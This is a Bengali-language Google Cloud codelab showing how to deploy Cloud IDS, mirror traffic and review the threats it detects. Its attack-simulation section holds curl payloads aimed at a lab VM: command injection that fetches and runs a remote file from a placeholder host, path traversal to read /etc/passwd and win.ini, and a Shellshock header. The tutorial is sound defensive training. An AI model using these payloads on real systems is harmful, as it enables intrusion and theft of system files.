১. ভূমিকা
এই ল্যাবে, আপনি ক্লাউড আইডিএস (Cloud IDS) স্থাপন করবেন, যা একটি পরবর্তী প্রজন্মের উন্নত অনুপ্রবেশ সনাক্তকরণ পরিষেবা এবং এটি অনুপ্রবেশ, ম্যালওয়্যার, স্পাইওয়্যার ও কমান্ড-অ্যান্ড-কন্ট্রোল আক্রমণের মতো হুমকি সনাক্ত করে। আপনি একাধিক আক্রমণের সিমুলেশন করবেন এবং ক্লাউড কনসোলে (Cloud Console) হুমকির বিস্তারিত তথ্য দেখবেন।
আপনি যা শিখবেন
- কীভাবে একটি ক্লাউড আইডিএস এন্ডপয়েন্ট তৈরি করবেন
- gcloud কমান্ড ব্যবহার করে কীভাবে ২টি ভার্চুয়াল মেশিন তৈরি করবেন
- প্যাকেট মিররিং পলিসি কীভাবে তৈরি করবেন
- ভার্চুয়াল মেশিন থেকে কীভাবে অ্যাটাক ট্র্যাফিক সিমুলেট করা যায়
- ক্লাউড কনসোল এবং ক্লাউড লগিং-এ হুমকির বিবরণ কীভাবে দেখবেন
আপনার যা যা লাগবে
- লিনাক্সের মৌলিক কমান্ড সম্পর্কে জ্ঞান
২. ক্লাউড আইডিএস ব্যবহারের ক্ষেত্রসমূহ
ক্লাউড আইডিএস গ্রাহকদের জন্য একটি গুগল ক্লাউড নেটিভ নেক্সট-জেন ইন্ট্রুশন ডিটেকশন সার্ভিস (আইডিএস) প্রদান করে, যা তাদের উন্নত থ্রেট ডিটেকশন এবং পিসিআই ১১.৪-এর মতো কমপ্লায়েন্সের প্রয়োজনীয়তা পূরণে সহায়তা করে। এই পরিষেবাটি পালো অল্টো নেটওয়ার্কস-এর থ্রেট প্রোটেকশন প্রযুক্তি দ্বারা চালিত হয়ে উন্নত ইন্ট্রুশন ডিটেকশন প্রদান করে। গুগল ক্লাউডের বিশ্বমানের পরিকাঠামো এবং পালো অল্টো নেটওয়ার্কস-এর বিশ্বমানের নিরাপত্তার সমন্বয়ে, গ্রাহকরা একটি সম্পূর্ণ পরিচালিত, উচ্চ কর্মক্ষমতা সম্পন্ন এবং সর্বোচ্চ নিরাপত্তা কার্যকারিতাসম্পন্ন উন্নত থ্রেট ডিটেকশন পরিষেবার এক অতুলনীয় সংমিশ্রণ লাভ করেন।
গ্রাহকরা যখন ক্লাউডে স্থানান্তরিত হন, তখন নিরাপত্তা তাদের কাছে সবচেয়ে গুরুত্বপূর্ণ বিষয় হয়ে ওঠে। তারা অন-প্রেমে থাকা ইন্ট্রুশন ডিটেকশন সার্ভিস (IDS)-এর মতো একই ধরনের নিরাপত্তা ব্যবস্থা ক্লাউডেও পেতে চান। একটি থার্ড-পার্টি নিরাপত্তা সমাধান স্থাপন করে তার পরিকাঠামো পরিচালনা করা বা নিজস্ব সিগনেচার আনার তুলনায়, তারা সহজে স্থাপনযোগ্যতা, উচ্চ কর্মক্ষমতা এবং অপ্টিমাইজড খরচের জন্য একটি ক্লাউড নেটিভ ম্যানেজড IDS সমাধান ব্যবহার করতে দৃঢ়ভাবে পছন্দ করেন। গুগল ক্লাউড IDS একটি এন্ড-টু-এন্ড এবং অটো-স্কেলিং ম্যানেজড IDS পরিষেবা প্রদান করে, যা গ্রাহকদের হুমকি বিশ্লেষণ ও প্রশমনে তাদের সময় ব্যয় করতে সক্ষম করে এবং পরিকাঠামো বা থ্রেট সিগনেচার পরিচালনার জন্য তাদের সময় ও সম্পদকে মুক্ত করে।
ক্লাউড আইডিএস আউট অফ ব্যান্ডে স্থাপন করা হয় এবং এটি হুমকি শনাক্ত করে সতর্ক করতে পারে, কিন্তু হুমকি প্রতিরোধ করতে পারে না। এটি গুগল ক্লাউড প্যাকেট মিররিং ব্যবহার করে নেটওয়ার্ক ট্র্যাফিকের একটি অনুলিপি তৈরি করে, যা পালো অল্টো নেটওয়ার্কের হুমকি শনাক্তকরণ ইঞ্জিন দ্বারা বিশ্লেষণ করা হয়।
৩. কোডল্যাব টপোলজি

চিত্র ১. এই ল্যাবের জন্য ক্লাউড আইডিএস স্থাপনের উচ্চ-স্তরের স্থাপত্যগত সংক্ষিপ্ত বিবরণ।
৪. সেটআপ এবং প্রয়োজনীয়তা
স্ব-গতিতে পরিবেশ সেটআপ
- Google Cloud Console- এ সাইন-ইন করুন এবং একটি নতুন প্রজেক্ট তৈরি করুন অথবা বিদ্যমান কোনো প্রজেক্ট পুনরায় ব্যবহার করুন। যদি আপনার আগে থেকে Gmail বা Google Workspace অ্যাকাউন্ট না থাকে, তবে আপনাকে অবশ্যই একটি তৈরি করতে হবে।



- প্রজেক্টের নামটি হলো এই প্রজেক্টের অংশগ্রহণকারীদের প্রদর্শিত নাম। এটি একটি ক্যারেক্টার স্ট্রিং যা গুগল এপিআই ব্যবহার করে না, এবং আপনি যেকোনো সময় এটি আপডেট করতে পারেন।
- সমস্ত গুগল ক্লাউড প্রজেক্ট জুড়ে প্রজেক্ট আইডি অবশ্যই অনন্য হতে হবে এবং এটি অপরিবর্তনীয় (একবার সেট করার পর পরিবর্তন করা যায় না)। ক্লাউড কনসোল স্বয়ংক্রিয়ভাবে একটি অনন্য স্ট্রিং তৈরি করে; সাধারণত এটি কী তা নিয়ে আপনার মাথা ঘামানোর দরকার নেই। বেশিরভাগ কোডল্যাবে, আপনাকে প্রজেক্ট আইডি উল্লেখ করতে হবে (এবং এটি সাধারণত
PROJECT_IDহিসাবে চিহ্নিত করা হয়), তাই যদি এটি আপনার পছন্দ না হয়, তবে এলোমেলোভাবে অন্য একটি তৈরি করুন, অথবা, আপনি নিজের আইডি দিয়ে চেষ্টা করে দেখতে পারেন যে সেটি উপলব্ধ আছে কিনা। এরপর প্রজেক্ট তৈরি হয়ে গেলে এটি "স্থির" হয়ে যায়। - তৃতীয় আরেকটি ভ্যালু আছে, যা হলো প্রজেক্ট নম্বর এবং কিছু এপিআই এটি ব্যবহার করে। এই তিনটি ভ্যালু সম্পর্কে আরও জানতে ডকুমেন্টেশন দেখুন।
- এরপরে, ক্লাউড রিসোর্স/এপিআই ব্যবহার করার জন্য আপনাকে ক্লাউড কনসোলে বিলিং চালু করতে হবে। এই কোডল্যাবটি সম্পন্ন করতে খুব বেশি খরচ হওয়ার কথা নয়, এমনকি আদৌ কোনো খরচ নাও হতে পারে। এই টিউটোরিয়ালের পর যাতে কোনো বিলিং না হয়, সেজন্য রিসোর্সগুলো বন্ধ করতে কোডল্যাবের শেষে দেওয়া যেকোনো "ক্লিন-আপ" নির্দেশাবলী অনুসরণ করুন। গুগল ক্লাউডের নতুন ব্যবহারকারীরা ৩০০ মার্কিন ডলারের ফ্রি ট্রায়াল প্রোগ্রামের জন্য যোগ্য।
ক্লাউড শেল শুরু করুন
যদিও গুগল ক্লাউড আপনার ল্যাপটপ থেকে দূরবর্তীভাবে পরিচালনা করা যায়, এই কোডল্যাবে আপনি গুগল ক্লাউড শেল ব্যবহার করবেন, যা ক্লাউডে চালিত একটি কমান্ড লাইন পরিবেশ।
GCP কনসোল থেকে উপরের ডানদিকের টুলবারে থাকা ক্লাউড শেল আইকনে ক্লিক করুন:

পরিবেশটি প্রস্তুত করতে এবং এর সাথে সংযোগ স্থাপন করতে মাত্র কয়েক মুহূর্ত সময় লাগবে। এটি শেষ হলে, আপনি এইরকম কিছু দেখতে পাবেন:

এই ভার্চুয়াল মেশিনটিতে আপনার প্রয়োজনীয় সমস্ত ডেভেলপমেন্ট টুলস লোড করা আছে। এটি একটি স্থায়ী ৫ জিবি হোম ডিরেক্টরি প্রদান করে এবং গুগল ক্লাউডে চলে, যা নেটওয়ার্ক পারফরম্যান্স ও অথেনটিকেশনকে ব্যাপকভাবে উন্নত করে। এই ল্যাবে আপনার সমস্ত কাজ শুধুমাত্র একটি ব্রাউজার দিয়েই করা যাবে।
৫. শুরু করার আগে
এপিআই সক্ষম করুন
ক্লাউড শেলের ভিতরে, নিশ্চিত করুন যে আপনার প্রজেক্ট আইডি সেট আপ করা আছে।
gcloud config list project gcloud config set project [YOUR-PROJECT-NAME] export PROJECT_ID=$(gcloud config get-value project | sed '2d')
সমস্ত প্রয়োজনীয় পরিষেবা সক্রিয় করুন
gcloud services enable compute.googleapis.com gcloud services enable ids.googleapis.com gcloud services enable logging.googleapis.com
৬. ভিপিসি নেটওয়ার্ক তৈরি করুন
ভিপিসি নেটওয়ার্ক
ক্লাউড শেল থেকে
gcloud compute networks create cloud-ids \ --subnet-mode=custom
সাবনেট
ক্লাউড শেল থেকে
gcloud compute networks subnets create cloud-ids-useast1 \ --range=192.168.10.0/24 \ --network=cloud-ids \ --region=us-east1
ব্যক্তিগত পরিষেবা অ্যাক্সেস
ক্লাউড শেল থেকে
gcloud compute addresses create cloud-ids-ips \ --global \ --purpose=VPC_PEERING \ --addresses=10.10.10.0 \ --prefix-length=24 \ --description="Cloud IDS Range" \ --network=cloud-ids
ব্যক্তিগত পরিষেবা সংযোগ
ক্লাউড শেল থেকে
gcloud services vpc-peerings connect \ --service=servicenetworking.googleapis.com \ --ranges=cloud-ids-ips \ --network=cloud-ids \ --project=$PROJECT_ID
ফায়ারওয়াল নিয়ম
আপনার VM ইনস্ট্যান্সগুলিতে IAP-কে সংযোগ করার অনুমতি দিতে, এমন একটি ফায়ারওয়াল নিয়ম তৈরি করুন যা:
- এটি সেই সমস্ত VM ইনস্ট্যান্সের ক্ষেত্রে প্রযোজ্য, যেগুলোকে আপনি IAP ব্যবহার করে অ্যাক্সেসযোগ্য করতে চান।
- 35.235.240.0/20 আইপি রেঞ্জ থেকে ইনগ্রেস ট্র্যাফিকের অনুমতি দেয়। এই রেঞ্জে সেই সমস্ত আইপি অ্যাড্রেস রয়েছে যা IAP টিসিপি ফরওয়ার্ডিংয়ের জন্য ব্যবহার করে।
ক্লাউড শেল থেকে
gcloud compute firewall-rules create allow-iap-proxy \ --direction=INGRESS \ --priority=1000 \ --network=cloud-ids \ --action=ALLOW \ --rules=tcp:22 \ --source-ranges=35.235.240.0/20
সার্ভারে স্ট্যান্ডার্ড HTTP পোর্ট (TCP 80) এবং ICMP প্রোটোকল অনুমোদনের জন্য:
- "সার্ভার" নেটওয়ার্ক ট্যাগযুক্ত রিসোর্সগুলির ক্ষেত্রে প্রযোজ্য।
- সকল উৎস থেকে প্রবেশের অনুমতি দেয়
ক্লাউড শেল থেকে
gcloud compute firewall-rules create allow-http-icmp \ --direction=INGRESS \ --priority=1000 \ --network=cloud-ids \ --action=ALLOW \ --rules=tcp:80,icmp \ --source-ranges=0.0.0.0/0 \ --target-tags=server
ক্লাউড NAT ইনস্ট্যান্স তৈরি করুন
ক্লাউড রাউটার
ক্লাউড শেল থেকে
gcloud compute routers create cr-cloud-ids-useast1 \ --region=us-east1 \ --network=cloud-ids
ক্লাউড ন্যাট
ক্লাউড শেল থেকে
gcloud compute routers nats create nat-cloud-ids-useast1 \ --router=cr-cloud-ids-useast1 \ --router-region=us-east1 \ --auto-allocate-nat-external-ips \ --nat-all-subnet-ip-ranges
৭. ক্লাউড আইডিএস এন্ডপয়েন্ট তৈরি করুন
এই অংশে, আপনি us-east1-এ একটি ক্লাউড IDS এন্ডপয়েন্ট তৈরি করবেন, যার সেভিয়ারিটি ইনফরমেশনাল হিসেবে সেট করা থাকবে। IDS এন্ডপয়েন্টটি তৈরি হতে প্রায় ২০ মিনিট সময় লাগে।
আইডিএস এন্ডপয়েন্ট
ক্লাউড শেল থেকে
gcloud ids endpoints create cloud-ids-east1 \ --network=cloud-ids \ --zone=us-east1-b \ --severity=INFORMATIONAL \ --async
ক্লাউড আইডিএস এন্ডপয়েন্ট চালু হয়েছে কিনা যাচাই করুন
gcloud ids endpoints list --project=$PROJECT_ID
আউটপুট -
ID: cloud-ids-east1 LOCATION: us-east1-b SEVERITY: INFORMATIONAL STATE: CREATING NETWORK: cloud-ids TRAFFIC_LOGS:
৮. ২টি ভার্চুয়াল মেশিন তৈরি করুন
এই অংশে, আপনি ২টি ভার্চুয়াল মেশিন তৈরি করবেন। প্রথমটি হবে আপনার ওয়েব সার্ভার, যা ক্লাউড আইডিএস-এ মিররিং করবে। দ্বিতীয় ভার্চুয়াল মেশিনটি হবে আপনার অ্যাটাক ট্র্যাফিকের উৎস।
ভার্চুয়াল মেশিন ১ (সার্ভার)
ক্লাউড শেল থেকে
gcloud compute instances create server \ --zone=us-east1-b \ --machine-type=e2-medium \ --subnet=cloud-ids-useast1 \ --no-address \ --private-network-ip=192.168.10.20 \ --metadata=startup-script=\#\!\ /bin/bash$'\n'sudo\ apt-get\ update$'\n'sudo\ apt-get\ -qq\ -y\ install\ nginx \ --tags=server \ --image=debian-10-buster-v20210512 \ --image-project=debian-cloud \ --boot-disk-size=10GB
ভার্চুয়াল মেশিন ২ (ক্লায়েন্ট)
ক্লাউড শেল থেকে
gcloud compute instances create attacker \ --zone=us-east1-b \ --machine-type=e2-medium \ --subnet=cloud-ids-useast1 \ --no-address \ --private-network-ip=192.168.10.10 \ --image=debian-10-buster-v20210512 \ --image-project=debian-cloud \ --boot-disk-size=10GB
৯. সার্ভার প্রস্তুত করা
এই টাস্কে, আপনাকে আপনার সার্ভার যাচাই করতে হবে এবং ক্লায়েন্টের জন্য একটি নিরীহ ম্যালওয়্যার পেলোড সরবরাহ করতে হবে।
ক্লাউড শেলের মাধ্যমে ভিএম-এ SSH করুন
gcloud compute ssh server --zone=us-east1-b --tunnel-through-iap
ওয়েব পরিষেবাটি চালু আছে কিনা তা নিশ্চিত করুন।
sudo systemctl status nginx
আউটপুট - সক্রিয় এবং চলমান যাচাই করুন
● nginx.service - A high performance web server and a reverse proxy server
Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2021-05-25 18:01:49 UTC; 5h 24min ago
Docs: man:nginx(8)
Main PID: 1347 (nginx)
Tasks: 3 (limit: 4665)
Memory: 4.5M
CGroup: /system.slice/nginx.service
├─1347 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
├─1348 nginx: worker process
└─1349 nginx: worker process
May 25 18:01:49 server systemd[1]: Starting A high performance web server and a reverse proxy server...
May 25 18:01:49 server systemd[1]: Started A high performance web server and a reverse proxy server.
ওয়েব পরিষেবাতে ডিরেক্টরি পরিবর্তন করুন
cd /var/www/html/
ওয়েব সার্ভারে একটি নিরীহ ম্যালওয়্যার ফাইল তৈরি করুন
sudo touch eicar.file
বিষয়বস্তু পেস্ট করুন
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | sudo tee eicar.file
ক্লাউডশেলে ফিরে যান
exit
একটি ক্লাউড আইডিএস প্যাকেট মিররিং পলিসি তৈরি করুন
IDS এন্ডপয়েন্ট ফরওয়ার্ডিং রুলটি শনাক্ত করুন এবং নিশ্চিত করুন যে IDS এন্ডপয়েন্টের অবস্থা "READY" রয়েছে।
gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b
উদাহরণ আউটপুট - 'endpointForwardingRule' থেকে মানটি কপি করুন
user1@cloudshell:~ (ids-project)$ gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b createTime: '2021-07-01T21:03:56.099839751Z' endpointForwardingRule: https://www.googleapis.com/compute/v1/projects/n3de7a2d45b28a050p-tp/regions/us-east1/forwardingRules/ids-fr-east-y085fcfwalsok1ca endpointIp: 172.16.30.43 name: projects/ids-project/locations/us-east1-b/endpoints/cloud-ids-east1 network: projects/ids-project/global/networks/cloud-ids severity: INFORMATIONAL state: READY updateTime: '2021-07-01T21:21:32.744309107Z'
IDS এন্ডপয়েন্ট ফরওয়ার্ডিং রুলটি একটি ভেরিয়েবলে সংরক্ষণ করুন।
export FORWARDING_RULE=$(gcloud ids endpoints describe cloud-ids-east1 --zone=us-east1-b --format="value(endpointForwardingRule)") echo $FORWARDING_RULE
প্যাকেট মিররিং নীতি
ক্লাউড শেল থেকে
gcloud compute packet-mirrorings create cloud-ids-packet-mirroring \ --region=us-east1 \ --collector-ilb=$FORWARDING_RULE \ --network=cloud-ids \ --mirrored-subnets=cloud-ids-useast1
প্যাকেট মিররিং পলিসি তৈরি করা হয়েছে কিনা যাচাই করুন
ক্লাউড শেল থেকে
gcloud compute packet-mirrorings list
আউটপুট
user1@cloudshell:~ (ids-project)$ gcloud compute packet-mirrorings list NAME REGION NETWORK ENABLE cloud-ids-packet-mirroring us-east1 cloud-ids TRUE
১০. আক্রমণ ট্র্যাফিক অনুকরণ করুন
আক্রমণকারী ভার্চুয়াল মেশিনে (ক্লায়েন্ট) SSH করুন
ক্লাউড শেল থেকে
gcloud compute ssh attacker --zone=us-east1-b --tunnel-through-iap
ক্ষতিকারক ট্র্যাফিক অনুকরণ করতে নিম্নলিখিত কার্ল (curl) অনুরোধগুলি চালান।
curl "http://192.168.10.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"
curl http://192.168.10.20/?item=../../../../WINNT/win.ini
curl http://192.168.10.20/eicar.file
curl http://192.168.10.20/cgi-bin/../../../..//bin/cat%20/etc/passwd
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' http://192.168.10.20/cgi-bin/test-critical
CloudShell-এ ফিরে যেতে VM থেকে প্রস্থান করুন।
exit
১১. ক্লাউড আইডিএস দ্বারা শনাক্ত করা হুমকিগুলো পর্যালোচনা করুন।
ক্লাউড আইডিএস ড্যাশবোর্ডে যান
নেভিগেশন মেনু > নেটওয়ার্ক নিরাপত্তা > ক্লাউড আইডিএস

থ্রেটস ট্যাবে যান।

যেমনটি দেখতে পাচ্ছেন, ক্লাউড আইডিএস বিভিন্ন অ্যাটাক ট্র্যাফিক প্রোফাইল ক্যাপচার করেছে এবং প্রতিটি থ্রেটের বিস্তারিত তথ্য প্রদান করেছে। আপনি যদি কোনো থ্রেট দেখতে না পান, তাহলে আপনাকে "রিফ্রেশ" বোতামে ক্লিক করতে হতে পারে। আমরা এখন আরেকটু গভীরে গিয়ে থ্রেটের বিস্তারিত তথ্য দেখব।
"Bash Remote Code Execution Vulnerability" থ্রেটটি খুঁজুন এবং ডানদিকে থাকা তিনটি ডটে ক্লিক করে "View threat details" নির্বাচন করুন।


এখন আমরা ক্লাউড লগিং-এ এই ঘটনার বিস্তারিত দেখব। বাম দিকের তীরচিহ্নে ক্লিক করে থ্রেটস পেজে ফিরে যান।
ডানদিকের তিনটি ডটে ক্লিক করুন এবং "View threat logs" নির্বাচন করুন।


ক্লাউড লগিং-এর জন্যও একই বিবরণ প্রদান করা হয়। এর মাধ্যমে আপনি লগগুলো ক্লাউড স্টোরেজ, ক্রনিকল, বা যেকোনো SIEM/SOAR-এ পাঠাতে পারেন। এছাড়াও আপনি অ্যালার্টের উপর ভিত্তি করে প্রতিকারমূলক ব্যবস্থা নেওয়ার জন্য কাস্টম ওয়ার্কফ্লো তৈরি করতে পারেন; যেমন—একটি ক্লাউড ফাংশন তৈরি করা যা অ্যালার্ট পেলে ট্রিগার হবে এবং আইপি অ্যাড্রেসটি ব্লক করার জন্য ফায়ারওয়াল রুল তৈরি/আপডেট করা, অথবা একটি ক্লাউড আর্মার পলিসি তৈরি/আপডেট করা।
১২. পরিষ্কার করার পদক্ষেপ
ভিএম ইনস্ট্যান্স থেকে প্রস্থান করুন (সমস্ত ট্যাব)
exit
একটিমাত্র ক্লাউড শেল টার্মিনাল থেকে ল্যাবের উপাদানগুলো মুছে ফেলুন
gcloud compute routers nats delete nat-cloud-ids-useast1 --router=cr-cloud-ids-useast1 --router-region=us-east1 --quiet gcloud compute routers delete cr-cloud-ids-useast1 --region=us-east1 --quiet gcloud compute instances delete server --zone=us-east1-b --quiet gcloud compute instances delete attacker --zone=us-east1-b --quiet gcloud compute firewall-rules delete allow-iap-proxy --quiet gcloud compute firewall-rules delete allow-http-icmp --quiet gcloud compute packet-mirrorings delete cloud-ids-packet-mirroring --region=us-east1 --quiet gcloud ids endpoints delete cloud-ids-east1 --zone=us-east1-b --quiet gcloud services vpc-peerings delete --service=servicenetworking.googleapis.com --network=cloud-ids --project=$PROJECT_ID --quiet gcloud compute addresses delete cloud-ids-ips --global --quiet gcloud compute networks subnets delete cloud-ids-useast1 --region us-east1 --quiet gcloud compute networks delete cloud-ids --quiet
১৩. অভিনন্দন!
কোডল্যাবটি সম্পন্ন করার জন্য অভিনন্দন।
আমরা যা আলোচনা করেছি
- ক্লাউড আইডিএস ব্যবহারের ক্ষেত্রসমূহ
- নেটওয়ার্কের প্রয়োজনীয়তা
- সমর্থিত এপিআই
- একটি ক্লাউড আইডিএস এন্ডপয়েন্ট তৈরি করা হয়েছে
- ২টি ভিএম স্থাপন করা হয়েছে
- ক্লায়েন্ট থেকে কিছু "আক্রমণাত্মক" ট্র্যাফিক তৈরি হয়েছে।
- IDS কর্তৃক যাচাইকৃত হুমকি শনাক্ত করা হয়েছে।
- হুমকির বিবরণ এবং লগ পর্যালোচনা করুন